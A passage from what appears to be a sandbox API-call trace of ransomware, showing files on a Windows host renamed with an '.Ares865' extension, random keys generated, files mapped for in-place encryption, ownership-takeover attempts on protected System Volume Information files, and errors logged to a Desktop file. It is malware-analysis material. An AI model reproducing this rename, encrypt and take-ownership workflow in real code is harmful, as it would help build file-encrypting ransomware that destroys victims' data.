(in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\MSHist012019091320190914\\index.dat.Ares865") returned 259 [0112.217] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\MSHist012019091320190914\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\history\\history.ie5\\mshist012019091320190914\\index.dat"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\MSHist012019091320190914\\index.dat.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\history\\history.ie5\\mshist012019091320190914\\index.dat.ares865"), dwFlags=0x1) returned 0 [0112.217] GetLastError () returned 0x20 [0112.217] wsprintfA (in: param_1=0x2ccd7d8, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\MSHist012019091320190914\\index.dat MoveFileEx error 32\r\n") returned 281 [0112.217] lstrlenA (lpString="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\MSHist012019091320190914\\index.dat MoveFileEx error 32\r\n") returned 281 [0112.217] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0112.218] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x8b57 [0112.218] WriteFile (in: hFile=0x118, lpBuffer=0x2ccd7d8*, nNumberOfBytesToWrite=0x119, lpNumberOfBytesWritten=0x2ccd174, lpOverlapped=0x0 | out: lpBuffer=0x2ccd7d8*, lpNumberOfBytesWritten=0x2ccd174*=0x119, lpOverlapped=0x0) returned 1 [0112.218] CloseHandle (hObject=0x118) returned 1 [0112.218] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0112.218] CloseHandle (hObject=0x0) returned 0 [0112.218] CloseHandle (hObject=0x0) returned 0 [0112.219] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x3897c980, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x3897c980, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x83c55340, ftLastWriteTime.dwHighDateTime=0x1d4d5ae, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="index.dat", cAlternateFileName="")) returned 0 [0112.219] FindClose (in: hFindFile=0x2ccde8 | out: hFindFile=0x2ccde8) returned 1 [0112.219] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7b90 [0112.253] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\System Volume Information\\MountPointManagerRemoteDatabase.Ares865") returned 68 [0112.254] MoveFileExW (lpExistingFileName="C:\\System Volume Information\\MountPointManagerRemoteDatabase" (normalized: "c:\\system volume information\\mountpointmanagerremotedatabase"), lpNewFileName="C:\\System Volume Information\\MountPointManagerRemoteDatabase.Ares865" (normalized: "c:\\system volume information\\mountpointmanagerremotedatabase.ares865"), dwFlags=0x1) returned 1 [0112.256] CreateFileW (lpFileName="C:\\System Volume Information\\MountPointManagerRemoteDatabase.Ares865" (normalized: "c:\\system volume information\\mountpointmanagerremotedatabase.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0112.256] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=0) returned 1 [0112.256] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0112.256] CloseHandle (hObject=0x0) returned 0 [0112.256] CloseHandle (hObject=0x118) returned 1 [0112.256] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x764bb2c0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x516b2240, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x516b2240, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SPP", cAlternateFileName="")) returned 1 [0112.256] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\System Volume Information\\Syscache.hve.Ares865") returned 49 [0112.256] MoveFileExW (lpExistingFileName="C:\\System Volume Information\\Syscache.hve" (normalized: "c:\\system volume information\\syscache.hve"), lpNewFileName="C:\\System Volume Information\\Syscache.hve.Ares865" (normalized: "c:\\system volume information\\syscache.hve.ares865"), dwFlags=0x1) returned 1 [0112.257] CreateFileW (lpFileName="C:\\System Volume Information\\Syscache.hve.Ares865" (normalized: "c:\\system volume information\\syscache.hve.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0112.257] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=262144) returned 1 [0112.258] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0112.258] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0112.258] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0112.259] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x40300, lpName=0x0) returned 0x124 [0112.260] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x40300) returned 0x420000 [0112.273] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0112.274] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0112.274] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0112.278] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\System Volume Information\\Syscache.hve.LOG1.Ares865") returned 54 [0112.278] MoveFileExW (lpExistingFileName="C:\\System Volume Information\\Syscache.hve.LOG1" (normalized: "c:\\system volume information\\syscache.hve.log1"), lpNewFileName="C:\\System Volume Information\\Syscache.hve.LOG1.Ares865" (normalized: "c:\\system volume information\\syscache.hve.log1.ares865"), dwFlags=0x1) returned 1 [0112.279] CreateFileW (lpFileName="C:\\System Volume Information\\Syscache.hve.LOG1.Ares865" (normalized: "c:\\system volume information\\syscache.hve.log1.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0112.279] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=41984) returned 1 [0112.279] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0112.280] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0112.280] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0112.280] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xa700, lpName=0x0) returned 0x124 [0112.282] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xa700) returned 0x190000 [0112.284] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0112.285] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0112.285] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0112.286] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\System Volume Information\\Syscache.hve.LOG2.Ares865") returned 54 [0112.286] MoveFileExW (lpExistingFileName="C:\\System Volume Information\\Syscache.hve.LOG2" (normalized: "c:\\system volume information\\syscache.hve.log2"), lpNewFileName="C:\\System Volume Information\\Syscache.hve.LOG2.Ares865" (normalized: "c:\\system volume information\\syscache.hve.log2.ares865"), dwFlags=0x1) returned 1 [0112.287] CreateFileW (lpFileName="C:\\System Volume Information\\Syscache.hve.LOG2.Ares865" (normalized: "c:\\system volume information\\syscache.hve.log2.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0112.287] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=0) returned 1 [0112.287] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0112.287] CloseHandle (hObject=0x0) returned 0 [0112.287] CloseHandle (hObject=0x118) returned 1 [0112.287] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x629b3040, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x629b3040, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0x68c55fe0, ftLastWriteTime.dwHighDateTime=0x1d2de2a, nFileSizeHigh=0x0, nFileSizeLow=0x5000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tracking.log", cAlternateFileName="")) returned 1 [0112.288] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\System Volume Information\\tracking.log.Ares865") returned 49 [0112.288] MoveFileExW (lpExistingFileName="C:\\System Volume Information\\tracking.log" (normalized: "c:\\system volume information\\tracking.log"), lpNewFileName="C:\\System Volume Information\\tracking.log.Ares865" (normalized: "c:\\system volume information\\tracking.log.ares865"), dwFlags=0x1) returned 1 [0112.290] CreateFileW (lpFileName="C:\\System Volume Information\\tracking.log.Ares865" (normalized: "c:\\system volume information\\tracking.log.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0112.290] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=20480) returned 1 [0112.291] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0112.291] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0112.291] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0112.291] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x5300, lpName=0x0) returned 0x124 [0112.292] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5300) returned 0x190000 [0112.293] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0112.294] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0112.294] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0112.296] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\System Volume Information\\{066f465a-4995-11e7-93e9-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}.Ares865") returned 113 [0112.296] MoveFileExW (lpExistingFileName="C:\\System Volume Information\\{066f465a-4995-11e7-93e9-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}" (normalized: "c:\\system volume information\\{066f465a-4995-11e7-93e9-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}"), lpNewFileName="C:\\System Volume Information\\{066f465a-4995-11e7-93e9-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}.Ares865" (normalized: "c:\\system volume information\\{066f465a-4995-11e7-93e9-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}.ares865"), dwFlags=0x1) returned 0 [0112.296] GetLastError () returned 0x5 [0112.296] AllocateAndInitializeSid (in: pIdentifierAuthority=0x2ccd148, nSubAuthorityCount=0x1, nSubAuthority0=0x0, nSubAuthority1=0x0, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x2ccd158 | out: pSid=0x2ccd158*=0x2cb658*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0)) returned 1 [0112.296] AllocateAndInitializeSid (in: pIdentifierAuthority=0x2ccd140, nSubAuthorityCount=0x2, nSubAuthority0=0x20, nSubAuthority1=0x220, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x2ccd164 | out: pSid=0x2ccd164*=0x2cb610*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0112.296] SetEntriesInAclW () returned 0x0 [0112.538] SetNamedSecurityInfoW () returned 0x5 [0112.538] SetNamedSecurityInfoW () returned 0x5 [0112.538] LocalFree (hMem=0x2ccee8) returned 0x0 [0112.538] wsprintfA (in: param_1=0x2ccd7d8, param_2="[ERROR] %S MoveFileEx TakeOwnership error %i\r\n" | out: param_1="[ERROR] C:\\System Volume Information\\{066f465a-4995-11e7-93e9-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752} MoveFileEx TakeOwnership error 5\r\n") returned 148 [0112.538] lstrlenA (lpString="[ERROR] C:\\System Volume Information\\{066f465a-4995-11e7-93e9-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752} MoveFileEx TakeOwnership error 5\r\n") returned 148 [0112.538] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0112.539] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x8c70 [0112.540] WriteFile (in: hFile=0x118, lpBuffer=0x2ccd7d8*, nNumberOfBytesToWrite=0x94, lpNumberOfBytesWritten=0x2ccd174, lpOverlapped=0x0 | out: lpBuffer=0x2ccd7d8*, lpNumberOfBytesWritten=0x2ccd174*=0x94, lpOverlapped=0x0) returned 1 [0112.540] CloseHandle (hObject=0x118) returned 1 [0112.541] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0112.541] CloseHandle (hObject=0x0) returned 0 [0112.541] CloseHandle (hObject=0x0) returned 0 [0112.541] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xf5b1ad80, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0xf5b1ad80, ftLastAccessTime.dwHighDateTime=0x1d2fc27, ftLastWriteTime.dwLowDateTime=0x42e4bc0, ftLastWriteTime.dwHighDateTime=0x1d2fc28, nFileSizeHigh=0x0, nFileSizeLow=0x1acc000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{12afb45a-681b-11e7-80b9-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}", cAlternateFileName="{12AFB~1")) returned 1 [0112.541] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\System Volume Information\\{12afb45a-681b-11e7-80b9-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}.Ares865") returned 113 [0112.541] MoveFileExW (lpExistingFileName="C:\\System Volume Information\\{12afb45a-681b-11e7-80b9-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}" (normalized: "c:\\system volume information\\{12afb45a-681b-11e7-80b9-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}"), lpNewFileName="C:\\System Volume Information\\{12afb45a-681b-11e7-80b9-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}.Ares865" (normalized: "c:\\system volume information\\{12afb45a-681b-11e7-80b9-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}.ares865"), dwFlags=0x1) returned 0 [0112.541] GetLastError () returned 0x5 [0112.541] AllocateAndInitializeSid (in: pIdentifierAuthority=0x2ccd148, nSubAuthorityCount=0x1, nSubAuthority0=0x0, nSubAuthority1=0x0, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x2ccd158 | out: pSid=0x2ccd158*=0x2cb658*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0)) returned 1 [0112.541] AllocateAndInitializeSid (in: pIdentifierAuthority=0x2ccd140, nSubAuthorityCount=0x2, nSubAuthority0=0x20, nSubAuthority1=0x220, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x2ccd164 | out: pSid=0x2ccd164*=0x2cb610*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0112.542] SetEntriesInAclW () returned 0x0 [0112.542] SetNamedSecurityInfoW () returned 0x5 [0112.542] SetNamedSecurityInfoW () returned 0x5 [0112.542] LocalFree (hMem=0x2ccee8) returned 0x0 [0112.542] wsprintfA (in: param_1=0x2ccd7d8, param_2="[ERROR] %S MoveFileEx TakeOwnership error %i\r\n" | out: param_1="[ERROR] C:\\System Volume Information\\{12afb45a-681b-11e7-80b9-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752} MoveFileEx TakeOwnership error 5\r\n") returned 148 [0112.542] lstrlenA (lpString="[ERROR] C:\\System Volume Information\\{12afb45a-681b-11e7-80b9-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752} MoveFileEx TakeOwnership error 5\r\n") returned 148 [0112.542] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0112.542] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x8d04 [0112.543] WriteFile (in: hFile=0x118, lpBuffer=0x2ccd7d8*, nNumberOfBytesToWrite=0x94, lpNumberOfBytesWritten=0x2ccd174, lpOverlapped=0x0 | out: lpBuffer=0x2ccd7d8*, lpNumberOfBytesWritten=0x2ccd174*=0x94, lpOverlapped=0x0) returned 1 [0112.543] CloseHandle (hObject=0x118) returned 1 [0112.543] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0112.543] CloseHandle (hObject=0x0) returned 0 [0112.543] CloseHandle (hObject=0x0) returned 0 [0112.543] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x12b0e40, ftCreationTime.dwHighDateTime=0x1d2fc28, ftLastAccessTime.dwLowDateTime=0x12b0e40, ftLastAccessTime.dwHighDateTime=0x1d2fc28, ftLastWriteTime.dwLowDateTime=0x76db90c0, ftLastWriteTime.dwHighDateTime=0x1d301bd, nFileSizeHigh=0x0, nFileSizeLow=0x1488c000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{12afb45e-681b-11e7-80b9-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}", cAlternateFileName="{12AFB~2")) returned 1 [0112.544] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\System Volume Information\\{12afb45e-681b-11e7-80b9-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}.Ares865") returned 113 [0112.544] MoveFileExW (lpExistingFileName="C:\\System Volume Information\\{12afb45e-681b-11e7-80b9-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}" (normalized: "c:\\system volume information\\{12afb45e-681b-11e7-80b9-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}"), lpNewFileName="C:\\System Volume Information\\{12afb45e-681b-11e7-80b9-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}.Ares865" (normalized: "c:\\system volume information\\{12afb45e-681b-11e7-80b9-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}.ares865"), dwFlags=0x1) returned 0 [0112.544] GetLastError () returned 0x5 [0112.544] AllocateAndInitializeSid (in: pIdentifierAuthority=0x2ccd148, nSubAuthorityCount=0x1, nSubAuthority0=0x0, nSubAuthority1=0x0, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x2ccd158 | out: pSid=0x2ccd158*=0x2cb658*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0)) returned 1 [0112.544] AllocateAndInitializeSid (in: pIdentifierAuthority=0x2ccd140, nSubAuthorityCount=0x2, nSubAuthority0=0x20, nSubAuthority1=0x220, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x2ccd164 | out: pSid=0x2ccd164*=0x2cb610*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0112.544] SetEntriesInAclW () returned 0x0 [0112.544] SetNamedSecurityInfoW () returned 0x5 [0112.544] SetNamedSecurityInfoW () returned 0x5 [0112.544] LocalFree (hMem=0x2ccee8) returned 0x0 [0112.544] wsprintfA (in: param_1=0x2ccd7d8, param_2="[ERROR] %S MoveFileEx TakeOwnership error %i\r\n" | out: param_1="[ERROR] C:\\System Volume Information\\{12afb45e-681b-11e7-80b9-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752} MoveFileEx TakeOwnership error 5\r\n") returned 148 [0112.544] lstrlenA (lpString="[ERROR] C:\\System Volume Information\\{12afb45e-681b-11e7-80b9-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752} MoveFileEx TakeOwnership error 5\r\n") returned 148 [0112.544] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0112.545] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x8d98 [0112.545] WriteFile (in: hFile=0x118, lpBuffer=0x2ccd7d8*, nNumberOfBytesToWrite=0x94, lpNumberOfBytesWritten=0x2ccd174, lpOverlapped=0x0 | out: lpBuffer=0x2ccd7d8*, lpNumberOfBytesWritten=0x2ccd174*=0x94, lpOverlapped=0x0) returned 1 [0112.547] CloseHandle (hObject=0x118) returned 1 [0112.547] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0112.547] CloseHandle (hObject=0x0) returned 0 [0112.547] CloseHandle (hObject=0x0) returned 0 [0112.547] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x769ca180, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x769ca180, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x769ca180, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{3808876b-c176-4e48-b7ae-04046e6cc752}", cAlternateFileName="{38088~1")) returned 1 [0112.547] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\System Volume Information\\{3808876b-c176-4e48-b7ae-04046e6cc752}.Ares865") returned 75 [0112.547] MoveFileExW (lpExistingFileName="C:\\System Volume Information\\{3808876b-c176-4e48-b7ae-04046e6cc752}" (normalized: "c:\\system volume information\\{3808876b-c176-4e48-b7ae-04046e6cc752}"), lpNewFileName="C:\\System Volume Information\\{3808876b-c176-4e48-b7ae-04046e6cc752}.Ares865" (normalized: "c:\\system volume information\\{3808876b-c176-4e48-b7ae-04046e6cc752}.ares865"), dwFlags=0x1) returned 0 [0112.547] GetLastError () returned 0x5 [0112.547] AllocateAndInitializeSid (in: pIdentifierAuthority=0x2ccd148, nSubAuthorityCount=0x1, nSubAuthority0=0x0, nSubAuthority1=0x0, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x2ccd158 | out: pSid=0x2ccd158*=0x2cb658*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0)) returned 1 [0112.547] AllocateAndInitializeSid (in: pIdentifierAuthority=0x2ccd140, nSubAuthorityCount=0x2, nSubAuthority0=0x20, nSubAuthority1=0x220, nSubAuthority2=0x0, 